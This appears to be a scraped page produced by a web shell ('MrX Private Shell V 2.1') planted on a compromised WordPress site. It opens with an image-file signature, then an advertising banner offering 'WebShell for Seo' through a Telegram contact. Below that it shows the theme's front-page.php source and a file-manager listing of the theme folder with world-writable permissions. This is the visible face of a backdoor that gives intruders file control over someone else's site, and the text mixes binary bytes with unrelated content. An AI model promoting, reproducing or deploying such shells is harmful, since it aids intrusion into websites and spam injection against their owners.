����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The front page template file
*
* If the user has selected a static page for their homepage, this is what will
* appear.
* Learn more: https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package WordPress
* @subpackage Twenty_Seventeen
* @since Twenty Seventeen 1.0
* @version 1.0
*/
get_header(); ?>
<div id="primary" class="content-area">
<main id="main" class="site-main" role="main">
<?php
// Show the selected front page content.
if ( have_posts() ) :
while ( have_posts() ) :
the_post();
get_template_part( 'template-parts/page/content', 'front-page' );
endwhile;
else :
get_template_part( 'template-parts/post/content', 'none' );
endif;
?>
<?php
// Get each of our panels and show the post data.
if ( 0 !== twentyseventeen_panel_count() || is_customize_preview() ) : // If we have pages to show.
/**
* Filter number of front page sections in Twenty Seventeen.
*
* @since Twenty Seventeen 1.0
*
* @param int $num_sections Number of front page sections.
*/
$num_sections = apply_filters( 'twentyseventeen_front_page_sections', 4 );
global $twentyseventeencounter;
// Create a setting and control for each of the sections available in the theme.
for ( $i = 1; $i < ( 1 + $num_sections ); $i++ ) {
$twentyseventeencounter = $i;
twentyseventeen_front_page_section( null, $i );
}
endif; // The if ( 0 !== twentyseventeen_panel_count() ) ends here.
?>
</main><!-- #main -->
</div><!-- #primary -->
<?php
get_footer();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| 404.php | File | 926 B | 0777 |
|
| archive.php | File | 1.8 KB | 0777 |
|
| comments.php | File | 2.36 KB | 0777 |
|
| error_log | File | 25.56 KB | 0777 |
|
| footer.php | File | 1.31 KB | 0777 |
|
| front-page.php | File | 1.52 KB | 0777 |
|
| functions.php | File | 20.37 KB | 0777 |
|
| header.php | File | 1.83 KB | 0777 |
|
| index.php | File | 2.1 KB | 0777 |
|
| page.php | File | 1002 B | 0777 |
|
| readme.txt | File | 4.31 KB | 0777 |
|
| rtl.css | File | 9.42 KB | 0777 |
|
| screenshot.png | File | 355.31 KB | 0777 |
|
| search.php | File | 2.01 KB | 0777 |
|
| searchform.php | File | 984 B | 0777 |
|
| sidebar.php | File | 522 B | 0777 |
|
| single.php | File | 1.59 KB | 0777 |
|
| style.css | File | 82.02 KB | 0777 |
|